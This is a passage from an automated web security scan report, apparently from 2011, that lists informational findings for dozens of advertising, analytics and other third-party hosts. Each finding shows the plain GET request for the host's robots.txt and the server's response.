Confidence:   Certain
Host:   http://metrics.citibank.com
Path:   /b/ss/prod/1/H.22.1/s0465555016417

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:10 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "3781bb-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www347
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.65. http://microsoftsto.112.2o7.net/b/ss/msstoslvnet/1/H.19.4/s9660573691129  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftsto.112.2o7.net
Path:   /b/ss/msstoslvnet/1/H.19.4/s9660573691129

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: microsoftsto.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:53:07 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "2f9156-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www49
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.66. http://mt0.googleapis.com/vt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt0.googleapis.com
Path:   /vt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mt0.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 16:47:54 GMT
Expires: Sun, 24 Apr 2011 16:47:54 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.67. http://mt1.googleapis.com/vt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt1.googleapis.com
Path:   /vt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mt1.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 16:47:54 GMT
Expires: Sun, 24 Apr 2011 16:47:54 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.68. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=84971492
Expires: Thu, 02 Jan 2014 04:27:30 GMT
Date: Sun, 24 Apr 2011 17:15:58 GMT
Connection: close

User-agent: *
Disallow: /

29.69. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:47:21 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

29.70. http://o.swisscom.ch/b/ss/swisscompublic/1/H.16/s08473835119511  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /b/ss/swisscompublic/1/H.16/s08473835119511

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: o.swisscom.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:49:53 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "4018f-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www423
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.71. http://omni.pcworld.com/b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omni.pcworld.com
Path:   /b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: omni.pcworld.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:50:55 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2e1114-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www62
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.72. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:45:42 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "271352-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www406
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.73. http://pagead2.googlesyndication.com/pagead/gen_204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/gen_204

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 24 Apr 2011 04:20:13 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

29.74. http://partners.nextadnetwork.com/tracking/js.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /tracking/js.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: partners.nextadnetwork.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:32 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: PHPSESSID=fda95be30a9ad7d5aff59add236c8b8d; path=/
X-Server-Name: www@dc1dtweb100
Content-Length: 60
Keep-Alive: timeout=3, max=918
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ad/
Disallow: /42/
Disallow: /z/

29.75. http://ping.hellobar.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.hellobar.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ping.hellobar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Tue, 19 Apr 2011 21:21:45 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /

29.76. http://pixel.mathtag.com/event/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x5 pid 0x3395 13205
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

29.77. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 25 Apr 2011 15:20:18 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 24 Apr 2011 15:20:18 GMT
Server: QS

User-agent: *
Disallow: /

29.78. http://polls-cdn.linkedin.com/javascripts/jquery-1.4.3.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://polls-cdn.linkedin.com
Path:   /javascripts/jquery-1.4.3.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: polls-cdn.linkedin.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:49:24 GMT
Server: PWS/1.7.1.5
X-Px: ms jfk-te3-n30 ( jfk-te3-n28), ht jfk-te3-n28.panthercdn.com
ETag: W/"204-1303178234000"
Cache-Control: max-age=604800
Expires: Wed, 27 Apr 2011 22:48:27 GMT
Age: 352857
Content-Length: 204
Content-Type: text/plain
Last-Modified: Tue, 19 Apr 2011 01:57:14 GMT
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

29.79. http://polls.linkedin.com/vote/131808/nzkbm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://polls.linkedin.com
Path:   /vote/131808/nzkbm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: polls.linkedin.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish Server Open Source Edition 3.0.1
Accept-Ranges: bytes
ETag: W/"204-1303178234000"
Last-Modified: Tue, 19 Apr 2011 01:57:14 GMT
Content-Type: text/plain
Content-Length: 204
Date: Mon, 25 Apr 2011 00:48:08 GMT
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

29.80. http://pubads.g.doubleclick.net/gampad/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 24 Apr 2011 20:01:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

29.81. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 24 Apr 2011 15:23:11 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

29.82. http://s0.2mdn.net/3095006/mpcs_040111_160x600_gm_android_1_fl.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /3095006/mpcs_040111_160x600_gm_android_1_fl.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 23 Apr 2011 21:20:10 GMT
Expires: Sun, 24 Apr 2011 21:20:10 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 55015

User-agent: *
Disallow: /

29.83. http://s1.2mdn.net/2675039/4-GGL_ADWORDS_CREATIVE1_728x90_GEN_B01_v2.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /2675039/4-GGL_ADWORDS_CREATIVE1_728x90_GEN_B01_v2.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 15:20:15 GMT
Expires: Mon, 25 Apr 2011 15:20:15 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

29.84. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYsv4CILb-AioFNb8AAAMyBTK_AAAH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYsv4CILb-AioFNb8AAAMyBTK_AAAH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 04:05:07 GMT
Expires: Sun, 24 Apr 2011 04:05:07 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.85. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 04:05:02 GMT
Expires: Sun, 24 Apr 2011 04:05:02 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.86. http://search.twitter.com/search.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:14:05 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:03:48 GMT
Accept-Ranges: bytes
Content-Length: 45
Cache-Control: max-age=86400
Expires: Mon, 25 Apr 2011 20:14:05 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /search
Disallow: /*?

29.87. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.identityguard.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:36:15 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Mon, 09 Nov 2009 22:17:19 GMT
ETag: "790912-a7-8e8bd9c0"
Accept-Ranges: bytes
Content-Length: 167
Cache-Control: max-age=3600
Expires: Sun, 24 Apr 2011 04:36:15 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# robots.txt file for https://secure.identityguard.com

User-agent: *
Disallow: /
Allow: /webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10051&catalogId=10001

29.88. https://secure.krypt.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /cart/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.krypt.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:39:41 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
Last-Modified: Wed, 20 Apr 2011 00:29:04 GMT
ETag: "50afd-75-4a14eb63fd400"
Accept-Ranges: bytes
Content-Length: 117
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cart
Disallow: /order
Disallow: /checkout
Disallow: /partner
Disallow: /active
Disallow: /js

29.89. http://sensic.net/wws/index.php/layer/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensic.net
Path:   /wws/index.php/layer/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sensic.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:49:50 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 07:57:02 GMT
ETag: "1284009-30-4a154f84d8f80"
Accept-Ranges: bytes
Content-Length: 48
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# No Robots allowed
User-agent: *
Disallow: /

29.90. http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smartcompanygrowth.com
Path:   /bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: smartcompanygrowth.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:40:17 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://smartcompanygrowth.com/xmlrpc.php
Set-Cookie: PHPSESSID=621377560b7a270e1b69b5c3371988f4; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://smartcompanygrowth.com/sitemap.xml.gz

29.91. http://smetrics.freecreditreport.com/b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smetrics.freecreditreport.com
Path:   /b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: smetrics.freecreditreport.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:56:03 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "31d150-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www262
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.92. http://spe.atdmt.com/ds/5RTLCLFLKLFL/v120_myidmylife/v120_myidmylife_v3_job_728x90.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /ds/5RTLCLFLKLFL/v120_myidmylife/v120_myidmylife_v3_job_728x90.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Fri, 29 Apr 2011 05:10:30 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

29.93. http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:46:38 GMT
Connection: close

User-agent: *
Disallow: /

29.94. http://switch.atdmt.com/jaction/LifeLock_Landing_Page  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /jaction/LifeLock_Landing_Page

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: switch.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Mon, 19 Oct 2009 19:29:35 GMT
Accept-Ranges: bytes
ETag: "4c95727df250ca1:0"
Date: Sun, 24 Apr 2011 03:16:37 GMT
Connection: close
Content-Length: 101

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

29.95. http://testdata.coremetrics.com/eluminate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://testdata.coremetrics.com
Path:   /eluminate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: testdata.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:20:55 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "273b3c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=933
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

29.96. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 03:19:03 GMT
Expires: Sun, 24 Apr 2011 03:19:03 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.97. http://tools.google.com/service/update2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.google.com
Path:   /service/update2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tools.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 04:05:43 GMT
Expires: Sun, 24 Apr 2011 04:05:43 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.98. http://tracking.keywordmax.com/tracking/show.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.keywordmax.com
Path:   /tracking/show.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tracking.keywordmax.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 22 Jun 2010 14:28:34 GMT
ETag: "74-4899f3c75c880"
Accept-Ranges: bytes
Content-Length: 116
X-Server-Name: kwmweb@dc1kwmweb04
Keep-Alive: timeout=3, max=194
Connection: close
Content-Type: text/plain

# Robots.txt file

# welcome robots to entire site
User-agent: *
# Disallow all robots from these areas
Disallow: /

29.99. http://translate.google.com/translate_a/element.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.google.com

Response

HTTP/1.0 200 OK
Date: Sun, 24 Apr 2011 20:33:44 GMT
Expires: Sun, 24 Apr 2011 20:33:44 GMT
Cache-Control: private, max-age=0
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: PREF=ID=3145a4e43597cf14:TM=1303677224:LM=1303677224:S=QQUyAfiSGVxig4EL; expires=Tue, 23-Apr-2013 20:33:44 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /?q=
Disallow: /?text=
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
D
...[SNIP]...

29.100. http://transunioninteractive.122.2o7.net/b/ss/tuitruecredit/1/H.22.1/s23772791333030  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://transunioninteractive.122.2o7.net
Path:   /b/ss/tuitruecredit/1/H.22.1/s23772791333030

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: transunioninteractive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:49:46 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "75fe0-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www18
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.101. https://vault.krypt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vault.krypt.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vault.krypt.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 12 Jun 2006 18:43:46 GMT
ETag: "8d82df-19-4160b548fbc80"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

29.102. http://widgets.digg.com/buttons/count  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 24 Apr 2011 04:06:32 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=336 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Mon, 25 Apr 2011 04:06:31 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

29.103. http://www.actividentity.com/device_identification_for_user_authentication  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /device_identification_for_user_authentication

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.actividentity.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Feb 2011 17:21:08 GMT
ETag: "50029e-4b-49d1e8e404900"
Accept-Ranges: bytes
